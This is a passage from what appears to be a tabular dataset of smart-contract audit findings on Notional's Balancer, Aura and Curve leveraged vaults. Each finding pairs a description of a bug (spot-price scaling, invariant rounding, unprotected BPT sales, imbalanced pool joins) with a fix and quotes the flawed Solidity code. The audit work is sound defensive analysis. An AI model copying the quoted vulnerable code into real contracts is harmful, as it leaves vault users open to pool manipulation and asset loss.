used within the `_calculateLPTokenValue` function to compare with the oracle price to detect any potential pool manipulation. However, the oracle price returned is in primary (base) / secondary (quote) format. As such, the comparison between the spot price (secondary-base/primary-quote) and oracle price (primary-base/secondary-quote) will be incorrect.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n function _calculateLPTokenValue(\\n..SNIP..\\n uint256 price = _getOraclePairPrice(primaryToken, address(tokens[i]));\\n\\n // Check that the spot price and the oracle price are near each other. If this is\\n // not true then we assume that the LP pool is being manipulated.\\n uint256 lowerLimit = price * (Constants.VAULT_PERCENT_BASIS - limit) / Constants.VAULT_PERCENT_BASIS;\\n uint256 upperLimit = price * (Constants.VAULT_PERCENT_BASIS + limit) / Constants.VAULT_PERCENT_BASIS;\\n if (spotPrices[i] < lowerLimit || upperLimit < spotPrices[i]) {\\n revert Errors.InvalidPrice(price, spotPrices[i]);\\n }\\n```\\n","Consider verifying if the comment of the `StableMath._calcSpotPrice` function is aligned with its implementation with the Balancer team.\\nIn addition, the `StableMath._calcSpotPrice` function is no longer used or found within the current version of Balancer's composable pool. Thus, there is no guarantee that the math within the `StableMath._calcSpotPrice` works with the current implementation. It is recommended to use the existing method in the current Composable Pool's StableMath, such as `_calcOutGivenIn` (ensure the fee is excluded) to compute the spot price.","If the spot price is incorrect, it might potentially fail to detect the pool has been manipulated or result in unintended reverts due to false positives. In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.","```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n" +BPT LP Token could be sold off during re-investment,medium,"BPT LP Token could be sold off during the re-investment process. BPT LP Tokens must not be sold to external DEXs under any circumstance because:\\nThey are used to redeem the underlying assets from the pool when someone exits the vault\\nThe BPTs represent the total value of the vault\\nWithin the `ConvexStakingMixin._isInvalidRewardToken` function, the implementation ensures that the LP Token (CURVE_POOL_TOKEN) is not intentionally or accidentally sold during the reinvestment process.\\n```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n\\nHowever, the same control was not implemented for the Balancer/Aura code. As a result, it is possible for LP Token (BPT) to be sold during reinvestment. Note that for non-composable Balancer pools, the pool tokens does not consists of the BPT token. Thus, it needs to be explicitly defined within the `_isInvalidRewardToken` function.\\n```\\nFile: AuraStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n }\\n```\\n\\nPer the sponsor's clarification below, the contracts should protect against the bot doing unintended things (including acting maliciously) due to coding errors, which is one of the main reasons for having the `_isInvalidRewardToken` function. Thus, this issue is a valid bug in the context of this audit contest.\\n",Ensure that the LP tokens cannot be sold off during re-investment.\\n```\\nfunction _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == TOKEN_3 ||\\n token == TOKEN_4 ||\\n token == TOKEN_5 ||\\n// Add the line below\\n token == BALANCER_POOL_TOKEN ||\\n token == address(AURA_BOOSTER) ||\\n token == address(AURA_REWARD_POOL) ||\\n token == address(Deployments.WETH)\\n );\\n}\\n```\\n,LP tokens (BPT) might be accidentally or maliciously sold off by the bots during the re-investment process. BPT LP Tokens must not be sold to external DEXs under any circumstance because:\\nThey are used to redeem the underlying assets from the pool when someone exits the vault\\nThe BPTs represent the total value of the vault,```\\nFile: ConvexStakingMixin.sol\\n function _isInvalidRewardToken(address token) internal override view returns (bool) {\\n return (\\n token == TOKEN_1 ||\\n token == TOKEN_2 ||\\n token == address(CURVE_POOL_TOKEN) ||\\n token == address(CONVEX_REWARD_POOL) ||\\n token == address(CONVEX_BOOSTER) ||\\n token == Deployments.ALT_ETH_ADDRESS\\n );\\n }\\n```\\n +Fewer than expected LP tokens if the pool is imbalanced during vault restoration,high,"The vault restoration function intends to perform a proportional deposit. If the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal. This results in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss for the vault shareholder.\\nPer the comment on Line 498, it was understood that the `restoreVault` function intends to deposit the withdrawn tokens back into the pool proportionally.\\n```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Restores withdrawn tokens from emergencyExit back into the vault proportionally.\\n /// Unlocks the vault after restoration so that normal functionality is restored.\\n /// @param minPoolClaim slippage limit to prevent front running\\n function restoreVault(\\n uint256 minPoolClaim, bytes calldata /* data */\\n ) external override whenLocked onlyNotionalOwner {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n\\n (IERC20[] memory tokens, /* */) = TOKENS();\\n uint256[] memory amounts = new uint256[](tokens.length);\\n\\n // All balances held by the vault are assumed to be used to re-enter\\n // the pool. Since the vault has been locked no other users should have\\n // been able to enter the pool.\\n for (uint256 i; i < tokens.length; i++) {\\n if (address(tokens[i]) == address(POOL_TOKEN())) continue;\\n amounts[i] = TokenUtils.tokenBalance(address(tokens[i]));\\n }\\n\\n // No trades are specified so this joins proportionally using the\\n // amounts specified.\\n uint256 poolTokens = _joinPoolAndStake(amounts, minPoolClaim);\\n..SNIP..\\n```\\n\\nThe main reason to join with all the pool's tokens in exact proportions is to minimize the price impact or slippage of the join. If the deposited tokens are imbalanced, they are often swapped internally within the pool, incurring slippage or fees.\\nHowever, the concept of proportional join to minimize slippage does not always hold with the current implementation of the `restoreVault` function.\\nProof-of-Concept\\nAt T0, assume that a pool is perfectly balanced (50%-50%) with 1000 WETH and 1000 stETH.\\nAt T1, an emergency exit is performed, the LP tokens are redeemed for the underlying pool tokens proportionally, and 100 WETH and 100 stETH are redeemed\\nAt T2, certain events happen or due to ongoing issues with the pool (e.g., attacks, bugs, mass withdrawal), the pool becomes imbalanced (30%-70%) with 540 WETH and 1260 stETH.\\nAt T3, the vault re-enters the withdrawn tokens to the pool proportionally with 100 WETH and 100 stETH. Since the pool is already imbalanced, attempting to enter the pool proportionally (50% WETH and 50% stETH) will incur additional slippage and penalties, resulting in fewer LP tokens returned.\\nThis issue affects both Curve and Balancer pools since joining an imbalanced pool will always incur a loss.\\nExplantation of imbalance pool\\nA Curve pool is considered imbalanced when there is an imbalance between the assets within it. For instance, the Curve stETH/ETH pool is considered imbalanced if it has the following reserves:\\nETH: 340,472.34 (31.70%)\\nstETH: 733,655.65 (68.30%)\\nIf a Curve Pool is imbalanced, attempting to perform a proportional join will not give an optimal return (e.g. result in fewer Pool LP tokens received).\\nIn Curve Pool, there are penalties/bonuses when depositing to a pool. The pools are always trying to balance themselves. If a deposit helps the pool to reach that desired balance, a deposit bonus will be given (receive extra tokens). On the other hand, if a deposit deviates from the pool from the desired balance, a deposit penalty will be applied (receive fewer tokens).\\n```\\ndef add_liquidity(amounts: uint256[N_COINS], min_mint_amount: uint256) -> uint256:\\n..SNIP..\\n if token_supply > 0:\\n # Only account for fees if we are not the first to deposit\\n fee: uint256 = self.fee * N_COINS / (4 * (N_COINS - 1))\\n admin_fee: uint256 = self.admin_fee\\n for i in range(N_COINS):\\n ideal_balance: uint256 = D1 * old_balances[i] / D0\\n difference: uint256 = 0\\n if ideal_balance > new_balances[i]:\\n difference = ideal_balance - new_balances[i]\\n else:\\n difference = new_balances[i] - ideal_balance\\n fees[i] = fee * difference / FEE_DENOMINATOR\\n if admin_fee != 0:\\n self.admin_balances[i] += fees[i] * admin_fee / FEE_DENOMINATOR\\n new_balances[i] -= fees[i]\\n D2 = self.get_D(new_balances, amp)\\n mint_amount = token_supply * (D2 - D0) / D0\\n else:\\n mint_amount = D1 # Take the dust if there was any\\n..SNIP..\\n```\\n\\nFollowing is the mathematical explanation of the penalties/bonuses extracted from Curve's Discord channel:\\nThere is a “natural” amount of D increase that corresponds to a given total deposit amount; when the pool is perfectly balanced, this D increase is optimally achieved by a balanced deposit. Any other deposit proportions for the same total amount will give you less D.\\nHowever, when the pool is imbalanced, a balanced deposit is no longer optimal for the D increase.","Consider providing the callers the option to deposit the reward tokens in a ""non-proportional"" manner if a pool becomes imbalanced. For instance, the function could allow the caller to swap the withdrawn tokens in external DEXs within the `restoreVault` function to achieve the most optimal proportion to minimize the penalty and slippage when re-entering the pool. This is similar to the approach in the vault's reinvest function.","There is no guarantee that a pool will always be balanced. Historically, there have been multiple instances where the largest curve pool (stETH/ETH) has become imbalanced (Reference #1 and #2).\\nIf the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal, leading to the deposit resulting in fewer LP tokens than possible due to the deposit penalty or slippage due to internal swap.\\nThe side-effect is that the vault restoration will result in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss of assets for the vault shareholder.","```\\nFile: SingleSidedLPVaultBase.sol\\n /// @notice Restores withdrawn tokens from emergencyExit back into the vault proportionally.\\n /// Unlocks the vault after restoration so that normal functionality is restored.\\n /// @param minPoolClaim slippage limit to prevent front running\\n function restoreVault(\\n uint256 minPoolClaim, bytes calldata /* data */\\n ) external override whenLocked onlyNotionalOwner {\\n StrategyVaultState memory state = VaultStorage.getStrategyVaultState();\\n\\n (IERC20[] memory tokens, /* */) = TOKENS();\\n uint256[] memory amounts = new uint256[](tokens.length);\\n\\n // All balances held by the vault are assumed to be used to re-enter\\n // the pool. Since the vault has been locked no other users should have\\n // been able to enter the pool.\\n for (uint256 i; i < tokens.length; i++) {\\n if (address(tokens[i]) == address(POOL_TOKEN())) continue;\\n amounts[i] = TokenUtils.tokenBalance(address(tokens[i]));\\n }\\n\\n // No trades are specified so this joins proportionally using the\\n // amounts specified.\\n uint256 poolTokens = _joinPoolAndStake(amounts, minPoolClaim);\\n..SNIP..\\n```\\n" +Rounding differences when computing the invariant,high,"The invariant is used to compute the spot price to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards). If the inputted invariant is inaccurate, the spot price computed might not be accurate and might not match the actual spot price of the Balancer Pool. In the worst-case scenario, it might potentially fail to detect the pool has been manipulated, and the trade proceeds to execute against the manipulated pool, leading to a loss of assets.\\nThe Balancer's Composable Pool codebase relies on the old version of the `StableMath._calculateInvariant` that allows the caller to specify if the computation should round up or down via the `roundUp` parameter.\\n```\\nFile: StableMath.sol\\n function _calculateInvariant(\\n uint256 amplificationParameter,\\n uint256[] memory balances,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n *********x************************************************************************************/\\n\\n unchecked {\\n // We support rounding up or down.\\n uint256 sum = 0;\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n\\n uint256 prevInvariant = 0;\\n uint256 invariant = sum;\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n\\n for (uint256 i = 0; i < 255; i++) {\\n uint256 P_D = balances[0] * numTokens;\\n for (uint256 j = 1; j < numTokens; j++) {\\n P_D = Math.div(Math.mul(Math.mul(P_D, balances[j]), numTokens), invariant, roundUp);\\n }\\n prevInvariant = invariant;\\n invariant = Math.div(\\n Math.mul(Math.mul(numTokens, invariant), invariant).add(\\n Math.div(Math.mul(Math.mul(ampTimesTotal, sum), P_D), _AMP_PRECISION, roundUp)\\n ),\\n Math.mul(numTokens + 1, invariant).add(\\n // No need to use checked arithmetic for the amp precision, the amp is guaranteed to be at least 1\\n Math.div(Math.mul(ampTimesTotal - _AMP_PRECISION, P_D), _AMP_PRECISION, !roundUp)\\n ),\\n roundUp\\n );\\n\\n if (invariant > prevInvariant) {\\n if (invariant - prevInvariant <= 1) {\\n return invariant;\\n }\\n } else if (prevInvariant - invariant <= 1) {\\n return invariant;\\n }\\n }\\n }\\n\\n revert CalculationDidNotConverge();\\n }\\n```\\n\\nWithin the `BalancerSpotPrice._calculateStableMathSpotPrice` function, the `StableMath._calculateInvariant` is computed rounding up per Line 90 below\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n uint256 ampParam,\\n uint256[] memory scalingFactors,\\n uint256[] memory balances,\\n uint256 scaledPrimary,\\n uint256 primaryIndex,\\n uint256 index2\\n ) internal pure returns (uint256 spotPrice) {\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n```\\n\\nThe new Composable Pool contract uses a newer version of the StableMath library where the `StableMath._calculateInvariant` function always rounds down. Following is the StableMath.sol of one of the popular composable pools in Arbitrum that uses the new StableMath library\\n```\\nfunction _calculateInvariant(uint256 amplificationParameter, uint256[] memory balances)\\n internal\\n pure\\n returns (uint256)\\n{\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n **********************************************************************************************/\\n\\n // Always round down, to match Vyper's arithmetic (which always truncates).\\n ..SNIP..\\n```\\n\\nThus, Notional rounds up when calculating the invariant, while Balancer's Composable Pool rounds down when calculating the invariant. This inconsistency will result in a different invariant","To avoid any discrepancy in the result, ensure that the StableMath library used by Balancer's Composable Pool and Notional's leverage vault are aligned, and the implementation of the StableMath functions is the same between them.","The invariant is used to compute the spot price to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards). If the inputted invariant is inaccurate, the spot price computed might not be accurate and might not match the actual spot price of the Balancer Pool. In the worst-case scenario, it might potentially fail to detect the pool has been manipulated, and the trade proceeds to execute against the manipulated pool, leading to a loss of assets.","```\\nFile: StableMath.sol\\n function _calculateInvariant(\\n uint256 amplificationParameter,\\n uint256[] memory balances,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n *********x************************************************************************************/\\n\\n unchecked {\\n // We support rounding up or down.\\n uint256 sum = 0;\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n\\n uint256 prevInvariant = 0;\\n uint256 invariant = sum;\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n\\n for (uint256 i = 0; i < 255; i++) {\\n uint256 P_D = balances[0] * numTokens;\\n for (uint256 j = 1; j < numTokens; j++) {\\n P_D = Math.div(Math.mul(Math.mul(P_D, balances[j]), numTokens), invariant, roundUp);\\n }\\n prevInvariant = invariant;\\n invariant = Math.div(\\n Math.mul(Math.mul(numTokens, invariant), invariant).add(\\n Math.div(Math.mul(Math.mul(ampTimesTotal, sum), P_D), _AMP_PRECISION, roundUp)\\n ),\\n Math.mul(numTokens + 1, invariant).add(\\n // No need to use checked arithmetic for the amp precision, the amp is guaranteed to be at least 1\\n Math.div(Math.mul(ampTimesTotal - _AMP_PRECISION, P_D), _AMP_PRECISION, !roundUp)\\n ),\\n roundUp\\n );\\n\\n if (invariant > prevInvariant) {\\n if (invariant - prevInvariant <= 1) {\\n return invariant;\\n }\\n } else if (prevInvariant - invariant <= 1) {\\n return invariant;\\n }\\n }\\n }\\n\\n revert CalculationDidNotConverge();\\n }\\n```\\n" +Incorrect scaling of the spot price,high,"The incorrect scaling of the spot price leads to the incorrect spot price, which is later compared with the oracle price.\\nIf the spot price is incorrect, it might potentially fail to detect the pool has been manipulated or result in unintended reverts due to false positives. In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.\\nPer the comment and source code at Lines 97 to 103, the `SPOT_PRICE.getComposableSpotPrices` is expected to return the spot price in native decimals.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n\\nWithin the `getComposableSpotPrices` function, it will trigger the `_calculateStableMathSpotPrice` function. When the primary and secondary balances are passed into the `StableMath._calculateInvariant` and `StableMath._calcSpotPrice` functions, they are scaled up to 18 decimals precision as StableMath functions only work with balances that have been normalized to 18 decimals.\\nAssuming that the following states:\\nPrimary Token = USDC (6 decimals)\\nSecondary Token = DAI (18 decimals)\\nPrimary Balance = 100 USDC (=100 * 1e6)\\nSecondary Balance = 100 DAI (=100 * 1e18)\\nscalingFactors[USDC] = 1e12 * Fixed.ONE (1e18) = 1e30\\nscalingFactors[DAI] = 1e0 * Fixed.ONE (1e18) = 1e18\\nThe price between USDC and DAI is 1:1\\nAfter scaling the primary and secondary balances, the scaled balances will be as follows:\\n```\\nscaledPrimary = balances[USDC] * scalingFactors[USDC] / BALANCER_PRECISION\\nscaledPrimary = 100 * 1e6 * 1e30 / 1e18\\nscaledPrimary = 100 * 1e18\\n\\nscaledSecondary = balances[DAI] * scalingFactors[DAI] / BALANCER_PRECISION\\nscaledSecondary = 100 * 1e18 * 1e18 / 1e18\\nscaledSecondary = 100 * 1e18\\n```\\n\\nThe spot price returned from the `StableMath._calcSpotPrice` function at Line 93 will be `1e18` (1:1).\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n uint256 ampParam,\\n uint256[] memory scalingFactors,\\n uint256[] memory balances,\\n uint256 scaledPrimary,\\n uint256 primaryIndex,\\n uint256 index2\\n ) internal pure returns (uint256 spotPrice) {\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n\\n // Remove scaling factors from spot price\\n spotPrice = spotPrice * scalingFactors[primaryIndex] / scalingFactors[index2];\\n }\\n```\\n\\nSubsequently, in Line 96 above, the code attempts to remove the scaling factor from the spot price (1e18).\\n```\\nspotPrice = spotPrice * scalingFactors[USDC] / scalingFactors[DAI];\\nspotPrice = 1e18 * 1e30 / 1e18\\nspotPrice = 1e30\\nspotPrice = 1e12 * 1e18\\n```\\n\\nThe `spotPrice[DAI-Secondary]` is not denominated in native precision after the scaling. The `SPOT_PRICE.getComposableSpotPrices` will return the following spot prices:\\n```\\nspotPrice[USDC-Primary] = 0\\nspotPrice[DAI-Secondary] = 1e12 * 1e18\\n```\\n\\nThe returned spot prices will be scaled to POOL_PRECISION (1e18). After the scaling, the spot price remains the same:\\n```\\nspotPrice[DAI-Secondary] = spotPrice[DAI-Secondary] * POOL_PRECISION / DAI_Decimal\\nspotPrice[DAI-Secondary] = 1e12 * 1e18 * 1e18 / 1e18\\nspotPrice[DAI-Secondary] = 1e12 * 1e18\\n```\\n\\nThe converted spot prices will be passed into the `_calculateLPTokenValue` function. Within the `_calculateLPTokenValue` function, the oracle price for DAI<>USDC will be `1e18`. From here, the `spotPrice[DAI-Secondary]` (1e12 * 1e18) is significantly different from the oracle price (1e18), which will cause the pool manipulation check to revert.\\n```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n","The spot price returned from `StableMath._calcSpotPrice` is denominated in 1e18 (POOL_PRECISION) since the inputted balances are normalized to 18 decimals. The scaling factors are used to normalize a balance to 18 decimals. By dividing or scaling down the spot price by the scaling factor, the native spot price will be returned.\\n```\\nspotPrice[DAI-Secondary] = spotPrice[DAI-Secondary] * Fixed.ONE / scalingFactors[DAI];\\nspotPrice = 1e18 * Fixed.ONE / (1e0 * Fixed.ONE)\\nspotPrice = 1e18 * 1e18 / (1e0 * 1e18)\\nspotPrice = 1e18\\n```\\n","The spot price is used to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards).\\nIf the spot price is incorrect, it might potentially result in the following:\\nFailure to detect the pool has been manipulated, resulting in the trade to execute against the manipulated pool, leading to a loss of assets.\\nUnintended reverts due to false positives, breaking core functionalities of the protocol that rely on the `_checkPriceAndCalculateValue` function.\\nThe affected `_checkPriceAndCalculateValue` function was found to be used within the following functions:\\n`reinvestReward` - If the `_checkPriceAndCalculateValue` function is malfunctioning or reverts unexpectedly, the protocol will not be able to reinvest, leading to a loss of value for the vault shareholders.\\n`convertStrategyToUnderlying` - This function is used by Notional V3 for the purpose of computing the collateral values and the account's health factor. If the `_checkPriceAndCalculateValue` function reverts unexpectedly due to an incorrect invariant/spot price, many of Notional's core functions will break. In addition, the collateral values and the account's health factor might be inflated if it fails to detect a manipulated pool due to incorrect invariant/spot price, potentially allowing the malicious actors to drain the main protocol.","```\\nFile: BalancerComposableAuraVault.sol\\n function _checkPriceAndCalculateValue() internal view override returns (uint256) {\\n (uint256[] memory balances, uint256[] memory spotPrices) = SPOT_PRICE.getComposableSpotPrices(\\n BALANCER_POOL_ID,\\n address(BALANCER_POOL_TOKEN),\\n PRIMARY_INDEX()\\n );\\n\\n // Spot prices are returned in native decimals, convert them all to POOL_PRECISION\\n // as required in the _calculateLPTokenValue method.\\n (/* */, uint8[] memory decimals) = TOKENS();\\n for (uint256 i; i < spotPrices.length; i++) {\\n spotPrices[i] = spotPrices[i] * POOL_PRECISION() / 10 ** decimals[i];\\n }\\n\\n return _calculateLPTokenValue(balances, spotPrices);\\n }\\n```\\n" +Incorrect Spot Price,high,"Multiple discrepancies between the implementation of Leverage Vault's `_calcSpotPrice` function and SDK were observed, which indicate that the computed spot price is incorrect.\\nIf the spot price is incorrect, it might potentially fail to detect the pool has been manipulated. In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.\\nThe `BalancerSpotPrice._calculateStableMathSpotPrice` function relies on the `StableMath._calcSpotPrice` to compute the spot price of two tokens.\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n```\\n\\n```\\nFile: StableMath.sol\\n /**\\n * @dev Calculates the spot price of token Y in token X.\\n */\\n function _calcSpotPrice(\\n uint256 amplificationParameter,\\n uint256 invariant, \\n uint256 balanceX,\\n uint256 balanceY\\n ) internal pure returns (uint256) {\\n /**************************************************************************************************************\\n // //\\n // 2.a.x.y + a.y^2 + b.y //\\n // spot price Y/X = - dx/dy = ----------------------- //\\n // 2.a.x.y + a.x^2 + b.x //\\n // //\\n // n = 2 //\\n // a = amp param * n //\\n // b = D + a.(S - D) //\\n // D = invariant //\\n // S = sum of balances but x,y = 0 since x and y are the only tokens //\\n **************************************************************************************************************/\\n\\n unchecked {\\n uint256 a = (amplificationParameter * 2) / _AMP_PRECISION;\\n uint256 b = Math.mul(invariant, a).sub(invariant);\\n\\n uint256 axy2 = Math.mul(a * 2, balanceX).mulDown(balanceY); // n = 2\\n\\n // dx = a.x.y.2 + a.y^2 - b.y\\n uint256 derivativeX = axy2.add(Math.mul(a, balanceY).mulDown(balanceY)).sub(b.mulDown(balanceY));\\n\\n // dy = a.x.y.2 + a.x^2 - b.x\\n uint256 derivativeY = axy2.add(Math.mul(a, balanceX).mulDown(balanceX)).sub(b.mulDown(balanceX));\\n\\n // The rounding direction is irrelevant as we're about to introduce a much larger error when converting to log\\n // space. We use `divUp` as it prevents the result from being zero, which would make the logarithm revert. A\\n // result of zero is therefore only possible with zero balances, which are prevented via other means.\\n return derivativeX.divUp(derivativeY);\\n }\\n }\\n```\\n\\nOn a high level, the spot price is computed by determining the pool derivatives. The Balancer SDK's provide a feature to compute the spot price of any two tokens within a pool, and it leverages the `_poolDerivatives` function.\\nThe existing function for computing the spot price of any two tokens of a composable pool has the following errors or discrepancies from the approach used to compute the spot price in Balancer SDK, which might lead to an inaccurate spot price being computed.\\nInstance 1\\nThe comments and SDK add `b.y` and `b.x` to the numerator and denominator, respectively, in the formula. However, the code performs a subtraction.\\nInstance 2\\nPer the comment and SDK code, $b = (S - D) a + D$.\\nHowever, assuming that $S$ is zero (for a two-token pool), the following code in the Leverage Vault to compute $b$ is not equivalent to the above.\\n```\\nuint256 b = Math.mul(invariant, a).sub(invariant);\\n```\\n\\nInstance 3\\nThe $S$ in the code will always be zero because the code is catered only for two-token pools. However, for a composable pool, it can support up to five (5) tokens in a pool. $S$ should be as follows, where $balances$ is all the tokens in a composable pool except for BPT.\\n$$ S = \\sum_{i \\neq \\text{tokenIndexIn}, i \\neq \\text{tokenIndexOut}} \\text{balances}[i] $$\\nInstance 4\\nInstance 5\\nPer SDK, the amplification factor is scaled down by $n^{(n - 1)}$ where $n$ is the number of tokens in a composable pool (excluding BPT). Otherwise, this was not implemented within the code.","Given multiple discrepancies between the implementation of Leverage Vault's `_calcSpotPrice` function and SDK and due to the lack of information on the web, it is recommended to reach out to the Balancer's protocol team to identify the actual formula used to determine a spot price of any two tokens within a composable pool and check out if the formula in the SDK is up-to-date to be used against the composable pool.\\nIt is also recommended to implement additional tests to ensure that the `_calcSpotPrice` returns the correct spot price of composable pools.\\nIn addition, the `StableMath._calcSpotPrice` function is no longer used or found within the current version of Balancer's composable pool. Thus, there is no guarantee that the math within the `StableMath._calcSpotPrice` works with the current implementation. It is recommended to use the existing method in the current Composable Pool's StableMath, such as `_calcOutGivenIn` (ensure the fee is excluded) to compute the spot price.","The spot price is used to verify if the pool has been manipulated before executing certain key vault actions (e.g. reinvest rewards). If the spot price is incorrect, it might potentially fail to detect the pool has been manipulated or result in unintended reverts due to false positives. In the worst-case scenario, the trade proceeds to execute against the manipulated pool, leading to a loss of assets.","```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n```\\n" +Incorrect invariant used for Balancer's composable pools,high,"Only two balances instead of all balances were used when computing the invariant for Balancer's composable pools, which is incorrect. As a result, pool manipulation might not be detected. This could lead to the transaction being executed on the manipulated pool, resulting in a loss of assets.\\n```\\nFile: BalancerSpotPrice.sol\\n function _calculateStableMathSpotPrice(\\n..SNIP..\\n // Apply scale factors\\n uint256 secondary = balances[index2] * scalingFactors[index2] / BALANCER_PRECISION;\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n ampParam, StableMath._balances(scaledPrimary, secondary), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice(ampParam, invariant, scaledPrimary, secondary);\\n..SNIP..\\n```\\n\\nA composable pool can support up to 5 tokens (excluding the BPT). When computing the invariant for a composable pool, one needs to pass in the balances of all the tokens within the pool except for BPT. However, the existing code always only passes in the balance of two tokens, which will return an incorrect invariant if the composable pool supports more than two tokens.\\nFollowing is the formula for computing the invariant of a composable pool taken from Balancer's Composable Pool. The `balances` passed into this function consist of all `balances` except for BPT (Reference)\\n```\\nfunction _calculateInvariant(uint256 amplificationParameter, uint256[] memory balances)\\n internal\\n pure\\n returns (uint256)\\n{\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n 